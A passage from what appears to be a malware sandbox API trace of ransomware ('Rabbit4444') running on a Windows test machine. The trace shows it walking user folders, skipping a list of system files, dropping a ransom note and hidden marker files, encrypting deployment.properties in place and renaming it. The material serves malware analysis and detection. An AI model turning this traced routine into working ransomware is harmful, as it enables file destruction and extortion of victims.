lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java" [0054.165] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\" [0054.165] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\.BFC0E91B00AE8A0620D3" [0054.166] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.166] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.169] FlushFileBuffers (hFile=0x27c) returned 1 [0054.170] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.170] CloseHandle (hObject=0x27c) returned 1 [0054.171] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java") returned 41 [0054.171] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.171] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe99b690f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0054.171] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.171] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.171] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.171] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.171] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe99b690f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.171] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.171] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.171] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.171] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.171] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.171] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe99b690f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe99b690f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe99b690f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.171] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.171] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.171] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x720729ee, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x720729ee, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 1 [0054.172] lstrcmpiW (lpString1="Deployment", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.172] lstrcmpiW (lpString1="Deployment", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.172] lstrcmpiW (lpString1="Deployment", lpString2="Rabbit4444.exe") returned -1 [0054.172] lstrcmpiW (lpString1="Deployment", lpString2=".") returned 1 [0054.172] lstrcmpiW (lpString1="Deployment", lpString2="..") returned 1 [0054.172] lstrcmpiW (lpString1="Deployment", lpString2="windows") returned -1 [0054.172] lstrcmpiW (lpString1="Deployment", lpString2="bootmgr") returned 1 [0054.172] lstrcmpiW (lpString1="Deployment", lpString2="pagefile.sys") returned -1 [0054.172] lstrcmpiW (lpString1="Deployment", lpString2="boot") returned 1 [0054.172] lstrcmpiW (lpString1="Deployment", lpString2="ids.txt") returned -1 [0054.172] lstrcmpiW (lpString1="Deployment", lpString2="NTUSER.DAT") returned -1 [0054.172] lstrcpyW (in: lpString1=0x130eb8c, lpString2="Deployment" | out: lpString1="Deployment") returned="Deployment" [0054.172] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0054.172] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6a) returned 0x117860 [0054.172] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6410 [0054.172] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x720729ee, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x720729ee, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 0 [0054.172] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0054.172] lstrcpyW (in: lpString1=0x130eb8c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.172] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.174] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.174] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.174] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.174] CloseHandle (hObject=0x278) returned 1 [0054.174] CloseHandle (hObject=0x27c) returned 1 [0054.174] GetCurrentThreadId () returned 0xd98 [0054.174] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0054.174] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment" [0054.174] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0054.174] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0054.174] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment" [0054.174] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\" [0054.174] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\.BFC0E91B00AE8A0620D3" [0054.174] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\deployment\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.177] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.180] FlushFileBuffers (hFile=0x27c) returned 1 [0054.181] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.181] CloseHandle (hObject=0x27c) returned 1 [0054.181] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment") returned 52 [0054.181] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.181] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x720729ee, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe99dc726, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0054.181] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.181] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.182] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.182] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.182] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x720729ee, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe99dc726, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.182] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.182] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.182] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.182] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.182] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.182] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe99dc726, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe99dc726, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe99dc726, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.182] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.182] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.182] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb084b30f, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb084b30f, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x7ab1bd35, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x2e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="deployment.properties", cAlternateFileName="DEPLOY~1.PRO")) returned 1 [0054.182] lstrcmpiW (lpString1="deployment.properties", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.182] lstrcmpiW (lpString1="deployment.properties", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.182] lstrcmpiW (lpString1="deployment.properties", lpString2="Rabbit4444.exe") returned -1 [0054.182] lstrcmpiW (lpString1="deployment.properties", lpString2=".") returned 1 [0054.182] lstrcmpiW (lpString1="deployment.properties", lpString2="..") returned 1 [0054.182] lstrcmpiW (lpString1="deployment.properties", lpString2="windows") returned -1 [0054.182] lstrcmpiW (lpString1="deployment.properties", lpString2="bootmgr") returned 1 [0054.182] lstrcmpiW (lpString1="deployment.properties", lpString2="pagefile.sys") returned -1 [0054.182] lstrcmpiW (lpString1="deployment.properties", lpString2="boot") returned 1 [0054.182] lstrcmpiW (lpString1="deployment.properties", lpString2="ids.txt") returned -1 [0054.182] lstrcmpiW (lpString1="deployment.properties", lpString2="NTUSER.DAT") returned -1 [0054.182] lstrcpyW (in: lpString1=0x130eba2, lpString2="deployment.properties" | out: lpString1="deployment.properties") returned="deployment.properties" [0054.182] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties", dwFileAttributes=0x2000) returned 1 [0054.183] lstrlenW (lpString="deployment.properties") returned 21 [0054.183] lstrlenW (lpString="Rabbit4444") returned 10 [0054.183] lstrcmpiW (lpString1="properties", lpString2="Rabbit4444") returned -1 [0054.183] lstrlenW (lpString=".dll") returned 4 [0054.183] lstrcmpiW (lpString1="ties", lpString2=".dll") returned 1 [0054.183] lstrlenW (lpString=".lnk") returned 4 [0054.183] lstrcmpiW (lpString1="ties", lpString2=".lnk") returned 1 [0054.183] lstrlenW (lpString=".ini") returned 4 [0054.183] lstrcmpiW (lpString1="ties", lpString2=".ini") returned 1 [0054.183] lstrlenW (lpString=".sys") returned 4 [0054.183] lstrcmpiW (lpString1="ties", lpString2=".sys") returned 1 [0054.183] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.183] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.183] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14549422863) returned 1 [0054.184] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=745) returned 1 [0054.184] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0054.184] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0054.184] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5f0, lpName=0x0) returned 0x298 [0054.185] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5f0) returned 0x70000 [0054.185] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.185] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0054.185] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.185] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0054.185] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.186] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0054.186] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.186] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0054.186] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14549657631) returned 1 [0054.186] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0054.186] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0054.186] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.186] CloseHandle (hObject=0x298) returned 1 [0054.186] CloseHandle (hObject=0x278) returned 1 [0054.186] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.Rabbit4444") returned 85 [0054.186] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties.rabbit4444"), dwFlags=0x1) returned 1 [0054.187] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xd337c3d9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xb07402a4, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="log", cAlternateFileName="")) returned 1 [0054.187] lstrcmpiW (lpString1="log", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.187] lstrcmpiW (lpString1="log", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.187] lstrcmpiW (lpString1="log", lpString2="Rabbit4444.exe") returned -1 [0054.187] lstrcmpiW (lpString1="log", lpString2=".") returned 1 [0054.187] lstrcmpiW (lpString1="log", lpString2="..") returned 1 [0054.187] lstrcmpiW (lpString1="log", lpString2="windows") returned -1 [0054.187] lstrcmpiW (lpString1="log", lpString2="bootmgr") returned 1 [0054.187] lstrcmpiW (lpString1="log", lpString2="pagefile.sys") returned -1 [0054.187] lstrcmpiW (lpString1="log", lpString2="boot") returned 1 [0054.187] lstrcmpiW (lpString1="log", lpString2="ids.txt") returned 1 [0054.187] lstrcmpiW (lpString1="log", lpString2="NTUSER.DAT") returned -1 [0054.187] lstrcpyW (in: lpString1=0x130eba2, lpString2="log" | out: lpString1="log") returned="log" [0054.187] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6488 [0054.187] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x72) returned 0x10e768 [0054.187] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6490 | out: ListHead=0xf68b0, ListEntry=0xf6490) returned 0xf6410 [0054.187] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07d8c0f, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07d8c0f, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb07d8c0f, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="security", cAlternateFileName="")) returned 1 [0054.187] lstrcmpiW (lpString1="security", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.187] lstrcmpiW (lpString1="security", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.187] lstrcmpiW (lpString1="security", lpString2="Rabbit4444.exe") returned 1 [0054.188] lstrcmpiW (lpString1="security", lpString2=".") returned 1 [0054.188] lstrcmpiW (lpString1="security", lpString2="..") returned 1 [0054.188] lstrcmpiW (lpString1="security", lpString2="windows") returned -1 [0054.188] lstrcmpiW (lpString1="security", lpString2="bootmgr") returned 1 [0054.188] lstrcmpiW (lpString1="security", lpString2="pagefile.sys") returned 1 [0054.188] lstrcmpiW (lpString1="security", lpString2="boot") returned 1 [0054.188] lstrcmpiW (lpString1="security", lpString2="ids.txt") returned 1 [0054.188] lstrcmpiW (lpString1="security", lpString2="NTUSER.DAT") returned 1 [0054.188] lstrcpyW (in: lpString1=0x130eba2, lpString2="security" | out: lpString1="security") returned="security" [0054.188] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63a8 [0054.188] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x7c) returned 0x102150 [0054.188] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63b0 | out: ListHead=0xf68b0, ListEntry=0xf63b0) returned 0xf6490 [0054.188] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x720729ee, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x720729ee, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x720729ee, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tmp", cAlternateFileName="")) returned 1 [0054.188] lstrcmpiW (lpString1="tmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.188] lstrcmpiW (lpString1="tmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.188] lstrcmpiW (lpString1="tmp", lpString2="Rabbit4444.exe") returned 1 [0054.188] lstrcmpiW (lpString1="tmp", lpString2=".") returned 1 [0054.188] lstrcmpiW (lpString1="tmp", lpString2="..") returned 1 [0054.188] lstrcmpiW (lpString1="tmp", lpString2="windows") returned -1 [0054.188] lstrcmpiW (lpString1="tmp", lpString2="bootmgr") returned 1 [0054.188] lstrcmpiW (lpString1="tmp", lpString2="pagefile.sys") returned 1 [0054.188] lstrcmpiW (lpString1="tmp", lpString2="boot") returned 1 [0054.188] lstrcmpiW (lpString1="tmp", lpString2="ids.txt") returned 1 [0054.188] lstrcmpiW (lpString1="tmp", lpString2="NTUSER.DAT") returned 1 [0054.188] lstrcpyW (in: lpString1=0x130eba2, lpString2="tmp" | out: lpString1="tmp") returned="tmp" [0054.188] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf64a8 [0054.188] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x72) returned 0x10eb68 [0054.188] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf64b0 | out: ListHead=0xf68b0, ListEntry=0xf64b0) returned 0xf63b0 [0054.188] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x720729ee, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x720729ee, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x720729ee, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tmp", cAlternateFileName="")) returned 0 [0054.188] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0054.188] lstrcpyW (in: lpString1=0x130eba2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.188] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\deployment\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.189] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.189] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.189] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.189] CloseHandle (hObject=0x278) returned 1 [0054.189] CloseHandle (hObject=0x27c) returned 1 [0054.189] GetCurrentThreadId () returned 0xd98 [0054.189] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf64b0 